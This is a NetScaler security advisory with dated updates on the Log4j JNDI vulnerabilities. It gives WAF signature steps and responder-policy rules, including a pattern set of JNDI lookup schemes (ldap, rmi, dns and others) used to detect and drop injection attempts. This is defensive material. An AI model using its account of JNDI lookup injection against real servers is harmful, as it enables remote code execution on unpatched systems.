A zero-day exploit affecting the Apache Log4j version from 2.0-beta9 to 2.14.1 was made public on December 9, 2021, as to which JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. As a result, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

NetScaler recommends that customers follow Apache’s recommendations. In addition, Web App Firewall (WAF) customers should consider the following recommendations to improve the security of their applications from this vulnerability.

The NetScaler research team has released updated WAF signatures designed to mitigate in part the CVE-2021-44228 vulnerability. If you are using any of these Log4j versions (from 2.0-beta9 to 2.14.1), NetScaler strongly recommends that you download the signatures version 73 and apply to your WAF deployments as an additional layer of protection for your applications. Signatures are compatible with the following software versions of NetScaler Application Delivery Controller (ADC) 11.1, 12.0, 12.1, 13.0 and 13.1. Please note, version 12.0 is End of Life. Learn more about the release life cycle at https://www.citrix.com/support/product-lifecycle/product-matrix.html.

If you are already using WAF with signatures with the auto-update feature enabled, you may follow these steps after verifying that the signature version is at least version 73.

1. Search your signatures for CVE-2021-44228 LogString.
2. Select the results.
3. Choose “Enable Rules” and click OK.

Click image to view larger.

NetScaler ADC Standard and Advanced edition customers, as well as Premium edition customers who do not have WAF signatures enabled, can use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global).

add policy patset patset_cve_2021_44228bind policy patset patset_cve_2021_44228 ldapbind policy patset patset_cve_2021_44228 httpbind policy patset patset_cve_2021_44228 httpsbind policy patset patset_cve_2021_44228 ldapsbind policy patset patset_cve_2021_44228 rmibind policy patset patset_cve_2021_44228 dnsadd responder policy mitigate_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP

NetScaler recommends WAF customers use the latest signature version, enable signatures auto-update, and subscribe to receive signature alert notifications. NetScaler will continue to monitor this dynamic situation and update as new mitigations become available.

Update 1 (December 15, 2021)

If any of your application availability is inadvertently impacted due to false positives resulting from the above-mentioned mitigation policies, NetScaler recommends the following modifications to the policy. Please note that any endpoint covered by the exception_list may expose those assets to the risks from CVE-2021-44228.

1. Modifications to Responder Policy

add policy patset exception_list# (Example: bind policy patset exception_list "/exception_url")set responder policy mitigate_exploit_cve_2021_44228 -rule q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && (HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228"))^

2. Modifications to WAF Policy

add policy patset exception_list# (Example: bind policy patset exception_list "/exception_url")Prepend the existing WAF policy with HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT# (Example :  set appfw policy my_WAF_policy q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && <existing rule>^

Update 2 (December 15, 2021)

A second Log4j vulnerability was reported on December 14 — CVE-2021-45046 — rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0.

NetScaler recommendations for CVE-2021-44228 with WAF Signatures version 73 and Responder policies, will also mitigate the CVE-2021-45046 vulnerability.

Update 3 (December 19, 2021)

Another Log4j vulnerability was reported on December 18 (CVE-2021-45105) that affects Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3).

NetScaler recommendations for CVE-2021-44228/CVE-2021-45046 with WAF Signatures version 73 and Responder policies will also mitigate the CVE-2021-45105 vulnerability exploits.

Update 4 (December 24, 2021)

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

NetScaler recommendations for CVE-2021-44228/CVE-2021-45046/CVE-2021-45105 with WAF Signatures version 73 and Responder policies have been validated against the above-mentioned CISA Apache Scanner to mitigate vulnerability exploits.

The current WAF signatures version 74 includes regular updates not related to Log4j vulnerabilities.

Update 5 (February 9, 2022)

Another critical Log4j vulnerability with a score 9.8 was reported on January 18th  - CVE-2022-23305 that affects Log4j versions from 1.2 to 1.2.17.

NetScaler recommends enabling SQL Injection Protection in WAF configuration to mitigate the CVE-2022-23305 vulnerability exploits. For customers, on software release versions 13.0 and 13.1 NetScaler recommends enabling SQL Grammar-based protection. 

Please note, an ADC firmware upgrade is not required for any of the above-mentioned Log4j mitigations. However, if for any other reason a new ADC build is needed, please use the following latest builds – 13.1.12.51, 13.0.84.11, or 12.1.63.24. In case any older build is installed post creating the protection with WAF signatures, please update WAF signatures to the latest version and ensure that the required signatures are enabled.

NetScaler will continue to update this advisory for CVE-2021-45105 as additional information becomes available.

Additional Information

WAF has a single code base across physical, virtual, bare-metal, and containers that brings consistency to your deployment model. This signature update applies to all form factors and deployment models of WAF.

To learn more about Web App Firewall, see https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/introduction-to-citrix-web-app-firewall.html.

To learn more about Web App Firewall signature, check out our alert articles and bot signature articles.

To learn about the signature alert notification, go to https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/signature-alerts/how-to-receive-signature-alert.html.

Patches and Mitigations

NetScaler strongly recommends that customers consider the security guidance from vendors of other products that they may have deployed. Until a patch is made available, you may reduce the risk of a successful attack by applying mitigations. Mitigations should not be considered full solutions as they do not fully address the underlying issue(s).